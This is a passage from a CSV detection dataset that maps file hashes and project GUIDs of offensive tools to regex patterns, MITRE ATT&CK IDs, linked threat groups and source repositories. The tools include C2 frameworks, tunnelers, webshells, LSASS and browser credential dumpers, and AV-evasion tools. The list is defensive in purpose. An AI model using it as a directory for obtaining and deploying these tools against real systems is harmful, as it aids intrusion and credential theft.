tool","https://github.com/rapid7/metasploit-framework","1","0","#content","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","25462" "*4201ced96159133a8d586be95533b285798a60e2ebd6cc3f391be1eb91c83fa2*",".{0,1000}4201ced96159133a8d586be95533b285798a60e2ebd6cc3f391be1eb91c83fa2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25463" "*4201d17c29662716ec98a94352ad59fbc96984e2ba7ee4878363642760da7bd3*",".{0,1000}4201d17c29662716ec98a94352ad59fbc96984e2ba7ee4878363642760da7bd3.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25464" "*420809c2672f7197f17c6aa6cd1530d6b703f76a413a6de4e0d1538fdd2cceeb*",".{0,1000}420809c2672f7197f17c6aa6cd1530d6b703f76a413a6de4e0d1538fdd2cceeb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25465" "*420e9c27a22ad9c6cb1535009bc23440b7a54fbef61d30e0702926e6a03502d3*",".{0,1000}420e9c27a22ad9c6cb1535009bc23440b7a54fbef61d30e0702926e6a03502d3.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","25466" "*423091502099d1c9adba971a42db7801b2e856c1fd5bed6f1ca70d0e39ca1a94*",".{0,1000}423091502099d1c9adba971a42db7801b2e856c1fd5bed6f1ca70d0e39ca1a94.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#filehash","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","25469" 
"*423fb953bce17ed5848e1fd48440846cb259a2981fb61906f94491d64e131728*",".{0,1000}423fb953bce17ed5848e1fd48440846cb259a2981fb61906f94491d64e131728.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25471" "*4243bea295573ba62e1bf4b685804539bab0286331a11e390f7e46abdc8ee785*",".{0,1000}4243bea295573ba62e1bf4b685804539bab0286331a11e390f7e46abdc8ee785.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","25473" "*424B81BE-2FAC-419F-B4BC-00CCBE38491F*",".{0,1000}424B81BE\-2FAC\-419F\-B4BC\-00CCBE38491F.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","25474" 
"*42528d08f25fcba2cb6088f4a1d810a1c1783ee3af573204094f81c2a4c0765c*",".{0,1000}42528d08f25fcba2cb6088f4a1d810a1c1783ee3af573204094f81c2a4c0765c.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","25475" "*42560ffa5cc3bf26dd9cf38c0bc8e2dbf853646128af8ca713e579023ff42ada*",".{0,1000}42560ffa5cc3bf26dd9cf38c0bc8e2dbf853646128af8ca713e579023ff42ada.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25478" "*42565c3d95ecec212407c937415035ad9beff85f000036ff05fd9c39022a57b7*",".{0,1000}42565c3d95ecec212407c937415035ad9beff85f000036ff05fd9c39022a57b7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25479" "*425e044558eb1b4ee187d3b222aa1c0cc62d760322d9d13c18c2aa7a3204c50d*",".{0,1000}425e044558eb1b4ee187d3b222aa1c0cc62d760322d9d13c18c2aa7a3204c50d.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","25480" "*425f2ddd85773aaf592043762f9132ef2173ef8ec2e69ce2d049d329dd9685b2*",".{0,1000}425f2ddd85773aaf592043762f9132ef2173ef8ec2e69ce2d049d329dd9685b2.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","25481" "*425fe29b9c497a1ea8c67cd9fe06cdf257efdeb73a2ebcd091039a2ff92434cd*",".{0,1000}425fe29b9c497a1ea8c67cd9fe06cdf257efdeb73a2ebcd091039a2ff92434cd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25482" 
"*4260354c3960e04e73b36289099665ce1cb839d1c56696639e782643c98dbe7b*",".{0,1000}4260354c3960e04e73b36289099665ce1cb839d1c56696639e782643c98dbe7b.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","25483" "*4265bff36f0564344447d7c71a1119354e408c3acddff3bdb27c61e7dac354ab*",".{0,1000}4265bff36f0564344447d7c71a1119354e408c3acddff3bdb27c61e7dac354ab.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25485" "*426ba2e010fea3c33ca7c28049d4ca4cb5a9ed3657fbdcb5e2749852b7c39002*",".{0,1000}426ba2e010fea3c33ca7c28049d4ca4cb5a9ed3657fbdcb5e2749852b7c39002.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25487" "*426d4834e4c5f0551f0e5c9ec4778282eab7c51b54d34f7409fb95d1e538697e*",".{0,1000}426d4834e4c5f0551f0e5c9ec4778282eab7c51b54d34f7409fb95d1e538697e.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25488" "*42751e43f472016665ac6fcccaae068dbbacd836665b11b187c025e45da439d2*",".{0,1000}42751e43f472016665ac6fcccaae068dbbacd836665b11b187c025e45da439d2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25490" "*4278e1122672d9c4029ec7c7f3a0e5180d7ad34a24519e80059b8fc9c5ea4df2*",".{0,1000}4278e1122672d9c4029ec7c7f3a0e5180d7ad34a24519e80059b8fc9c5ea4df2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25492" "*42792c009e76d5dadcc9fbefde5c21157ed86b874aa8513936eefd9c1e2c3a88*",".{0,1000}42792c009e76d5dadcc9fbefde5c21157ed86b874aa8513936eefd9c1e2c3a88.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","25493" "*427a990d8ee64c640faa8e1be48637ef64ec300615686d4bf212503c7926e2d4*",".{0,1000}427a990d8ee64c640faa8e1be48637ef64ec300615686d4bf212503c7926e2d4.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - 
T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","25494" "*427fabcb0798815ea87800466f168023502fc0c12a17f45b40c078bac25fbac5*",".{0,1000}427fabcb0798815ea87800466f168023502fc0c12a17f45b40c078bac25fbac5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25497" "*4280a088866261d65bcfb3409133327b35626000c4c5b838d50c0d650baa8a62*",".{0,1000}4280a088866261d65bcfb3409133327b35626000c4c5b838d50c0d650baa8a62.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","25498" "*42914217da8d5f50f1eb540af6b49433fbfbe42f598bb4ecd162ef2c88d07f1f*",".{0,1000}42914217da8d5f50f1eb540af6b49433fbfbe42f598bb4ecd162ef2c88d07f1f.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#filehash","N/A","10","","N/A","","","","25500" "*4291df077f27794311313530ae25457a0fbad23d402c789ed3336ace4b64150c*",".{0,1000}4291df077f27794311313530ae25457a0fbad23d402c789ed3336ace4b64150c.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense 
Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","#filehash","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","25501" "*42963db39280206317fca8b24f4f10baa9f6b2231cc150ac3c2ef6e4481bdc3c*",".{0,1000}42963db39280206317fca8b24f4f10baa9f6b2231cc150ac3c2ef6e4481bdc3c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25502" "*429be1a6cfaedaf84394b9c8364ccbfc353788f2332d6143b0131d48d39eac22*",".{0,1000}429be1a6cfaedaf84394b9c8364ccbfc353788f2332d6143b0131d48d39eac22.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25506" "*429ce1891bbe55f6b39e8c0b32ddeb392246f8b2186b32a348114965453a3f53*",".{0,1000}429ce1891bbe55f6b39e8c0b32ddeb392246f8b2186b32a348114965453a3f53.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25507" 
"*42a1be47225d778ad55b6acccfe487239ddc6ee0cc5b5471038568dd2910811f*",".{0,1000}42a1be47225d778ad55b6acccfe487239ddc6ee0cc5b5471038568dd2910811f.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","25508" "*42a8c91d6435ea450e9ad759489c603dd7ec731a28eb736ec818a21a964a2fee*",".{0,1000}42a8c91d6435ea450e9ad759489c603dd7ec731a28eb736ec818a21a964a2fee.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25510" "*42b0df4d8c38bc8123175b5ef8c2157bee1bb1b714ea4514bf7e6e59d27679f7*",".{0,1000}42b0df4d8c38bc8123175b5ef8c2157bee1bb1b714ea4514bf7e6e59d27679f7.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25512" "*42bb8ff889457f6d971aaaff1ccb6550c66bfab0af20c534664a03346a3a777b*",".{0,1000}42bb8ff889457f6d971aaaff1ccb6550c66bfab0af20c534664a03346a3a777b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25513" 
"*42bca2c91d21644cc8743f9cf6c0ced70d4fb27b3575cde43629633d19bfd718*",".{0,1000}42bca2c91d21644cc8743f9cf6c0ced70d4fb27b3575cde43629633d19bfd718.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25514" "*42bcc191d46a5c1e8fe0f153a2d5954e4c6ef26b5b07d8c132ddbf1e9671c2cc*",".{0,1000}42bcc191d46a5c1e8fe0f153a2d5954e4c6ef26b5b07d8c132ddbf1e9671c2cc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25515" "*42BDEFC0-0BAE-43DF-97BB-C805ABFBD078*",".{0,1000}42BDEFC0\-0BAE\-43DF\-97BB\-C805ABFBD078.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","#GUIDproject","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","25516" "*42c6d6eb1e991b9adbdb2ec6563530d9123bd02dbde27e2a547c25d9feb41473*",".{0,1000}42c6d6eb1e991b9adbdb2ec6563530d9123bd02dbde27e2a547c25d9feb41473.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25517" "*42c8296e0f553026ef98c9c89a1a6a60613c990621b9f04cf925833eb0572446*",".{0,1000}42c8296e0f553026ef98c9c89a1a6a60613c990621b9f04cf925833eb0572446.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25518" "*42c99aa68fec2ee65d35559eac9d40b572bd5870c59b28e1f76da076c7ac4636*",".{0,1000}42c99aa68fec2ee65d35559eac9d40b572bd5870c59b28e1f76da076c7ac4636.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25519" 
"*42d19694b284a82d02a8662edb4db86c22122ea981ca36aced94c4ba67fff072*",".{0,1000}42d19694b284a82d02a8662edb4db86c22122ea981ca36aced94c4ba67fff072.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","25520" "*42d7b0b5c7be5fd50091d36d37de388ea14f95e5ce4c1cff718ac16eacb5a952*",".{0,1000}42d7b0b5c7be5fd50091d36d37de388ea14f95e5ce4c1cff718ac16eacb5a952.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25521" "*42d93b315b6016a420d76e3b99e46a1baa57636d30b26bc4c556a0c3b3d70a6b*",".{0,1000}42d93b315b6016a420d76e3b99e46a1baa57636d30b26bc4c556a0c3b3d70a6b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25522" "*42dd027e9404976db7b50f3ba2885c133d1516f3cb03b2f1a715a26de79ad330*",".{0,1000}42dd027e9404976db7b50f3ba2885c133d1516f3cb03b2f1a715a26de79ad330.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25523" "*42e10ec6f9a5276060bade151ccd929325daa8ac8910ee26de5e6eebe10f77aa*",".{0,1000}42e10ec6f9a5276060bade151ccd929325daa8ac8910ee26de5e6eebe10f77aa.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","#filehash","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","25524" "*42e2d4b8d628e3df77baf23238076afb7003f1d31fb08032324f249d80df8302*",".{0,1000}42e2d4b8d628e3df77baf23238076afb7003f1d31fb08032324f249d80df8302.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","25525" "*42e42476084102789dfef4a1369a3028c2319de6a34ba704db907dedf63e2b29*",".{0,1000}42e42476084102789dfef4a1369a3028c2319de6a34ba704db907dedf63e2b29.{0,1000}","offensive_tool_keyword","Invoke-PowerIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/The-Viper-One/Invoke-PowerIncrease","1","0","#filehash","N/A","8","1","3","0","2024-08-01T18:10:02Z","2024-07-18T17:40:26Z","25526" "*42e504f3d9d9800c1c75ff6d8c5433d801e7148760cba709fa3bd5dd8e4a0208*",".{0,1000}42e504f3d9d9800c1c75ff6d8c5433d801e7148760cba709fa3bd5dd8e4a0208.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - 
TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","25527" "*42e93d295e08ea6af4885814b8cf66d43a875be0ee5b8966b5685e3e5269efb6*",".{0,1000}42e93d295e08ea6af4885814b8cf66d43a875be0ee5b8966b5685e3e5269efb6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25528" "*42ed4b264f24de92e3387050c12873516deca3c8ac74a6f598931f1c7cbe2180*",".{0,1000}42ed4b264f24de92e3387050c12873516deca3c8ac74a6f598931f1c7cbe2180.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25529" "*42f2144abf71b5273d1d0164a4ac254089b29a374f198cb5e0c15bcb7fd717ac*",".{0,1000}42f2144abf71b5273d1d0164a4ac254089b29a374f198cb5e0c15bcb7fd717ac.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
